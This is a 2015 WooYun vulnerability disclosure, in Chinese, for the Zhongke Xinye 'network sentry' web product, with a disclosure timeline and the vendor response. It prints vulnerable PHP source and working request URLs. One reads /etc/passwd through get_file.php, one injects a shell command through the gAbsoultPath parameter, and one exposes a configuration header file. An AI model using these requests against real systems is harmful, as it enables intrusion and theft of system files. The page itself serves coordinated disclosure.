当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123369

漏洞标题:中科新业网络哨兵任意文件读取/命令执行/信息泄露

相关厂商:中科新业

漏洞作者: menmen519

提交时间:2015-07-02 10:41

修复时间:2015-10-01 13:40

公开时间:2015-10-01 13:40

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-02: 细节已通知厂商并且等待厂商处理中
2015-07-03: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-07-06: 细节向第三方安全合作伙伴开放
2015-08-27: 细节向核心白帽子及相关领域专家公开
2015-09-06: 细节向普通白帽子公开
2015-09-16: 细节向实习白帽子公开
2015-10-01: 细节向公众公开

简要描述:

中科新业网络哨兵任意文件读取/命令执行/信息泄露

详细说明:

首先看文件读取:
get_file.php:

<?php
/*********************/
/*                   */
/*  Dezend for PHP5  */
/*         NWS       */
/*      Nulled.WS    */
/*                   */
/*********************/
@set_time_limit( 60 );
if ( isset( $_GET['view'] ) && file_exists( $_GET['view'] ) )
{
				header( "Content-Type: application/octet-stream" );
				header( "Content-Disposition: attachment; filename=".basename( $_GET['view'] ) );
				readfile( $_GET['view'] );
}
else if ( isset( $_GET['view'] ) )
{
				echo $_GET['view']." 不能读取!";
}
?>


这个很简单 访问
**.**.**.**/ucenter/include/get_file.php?view=/etc/passwd
命令执行:
send_cmd_start.php:

include_once( "../include/globalvar.h" );
include_once( "../include/connectdb.php" );
include_once( "../include/addsystemlog.php" );
include_once( "../openssl/maintain_cmd_send.php" );
require_once( "../include/remoteconfig.php" );
require_once( "../include/remotelang_{$charset}.php" );
if ( $sesstion_lang == "3" )
{
				$remotehelp = $remotelang['en']['sendremoterequest'];
}
else if ( $sesstion_lang == "2" )
{
				$remotehelp = $remotelang['big5']['sendremoterequest'];
}
else
{
				$remotehelp = $remotelang['gb']['sendremoterequest'];
}
global $sUserId;
addsystemlog( $sUserId."{$remotehelp}!" );
session_start( );
session_destroy( );
$status = trim( file_get_contents( "../../progress.ini" ) );
$start_time = date( "Y-m-d H:i:s" );
if ( $status == "-d" || $status == "-f" || $status == "-n" )
{
				setsystemconfigvalue( "gStartMaintainTime", strtotime( $start_time ) );
}
$gStartMaintainTime = getsystemconfigvaluewh( "gStartMaintainTime" );
if ( $gStartMaintainTime == 0 || $status == "-d" || $status == "-f" || $status == "-n" )
{
				$ServerHost = $_SERVER['SERVER_NAME'];
				$gMaintainCmd = new MaintainCmd( );
				$date = date( "Y-m-d H:i:s", time( ) );
				$gMaintainCmd->SetPubKey( "../openssl/client.crt", 1 );
				$gMaintainCmd->connect( $ServerHost, 7002 );
				$gMaintainCmd->SendCmd( "4001", "" );
}
$sourcefilepath = $gAbsoultPath."systemMT.php";
$desfilepath = $gAbsoultPath."index.php";
system( "cp -f {$sourcefilepath} {$desfilepath}" );


访问url:
**.**.**.**/ucenter/remotewh/sendcmd_start.php?gAbsoultPath=x | cat /etc/passwd > a.txt |
然后访问
**.**.**.**/ucenter/remotewh/a.txt

1.png


下来看信息泄露,在php环境中.h文件是不被解析的,如果需要解析,必须在配置文件里面做配置
访问
**.**.**.**/ucenter/include/globalvar_center.h

2.png


搜索一下

3.png


例子:
eg:
**.**.**.**/ucenter/
**.**.**.**/ucenter/
**.**.**.**/ucenter/
**.**.**.**/ucenter/
**.**.**.**/ucenter/

漏洞证明:

修复方案:

版权声明:转载请注明来源 menmen519@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-07-03 13:39

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过软件生产厂商公开联系渠道向其邮件通报,由其后续提供解决方案并协调相关用户单位处置。

最新状态:

暂无